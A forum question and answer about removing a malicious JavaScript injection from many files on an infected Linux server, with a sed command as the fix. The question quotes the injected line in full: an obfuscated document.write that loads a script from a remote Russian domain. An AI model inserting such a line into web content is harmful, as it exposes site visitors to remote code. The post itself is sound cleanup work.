How To Remove A Malicious Javascript Code From Multiple Files

Question

Hi there,

Recently my linux server got infected with malware and as a result, I have 100+ files infected with a single line of Javascript code:

document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Kilobyte.js"&gt;&lt;/scri'+'pt&gt;');

I would be too tiring to remove it manually, so I dig into google (not knowing much about linux did not help there) and found out that I can use sed for this purpose.

Unfortunately, I couldn't escape the line so I could use

sed -i.bak '/line of text/d' *

syntax, it's full of single quotes, double quotes and backslashes.

How could I escape the string or is there any other - easier - way of doing this?

Answer 1

Could you not just use sed to delete any line containing, for example, alienradar.ru, or some other substring which only exists in the offensive lines ? Something like:

sed -i.bak '/alienradar.ru/d' *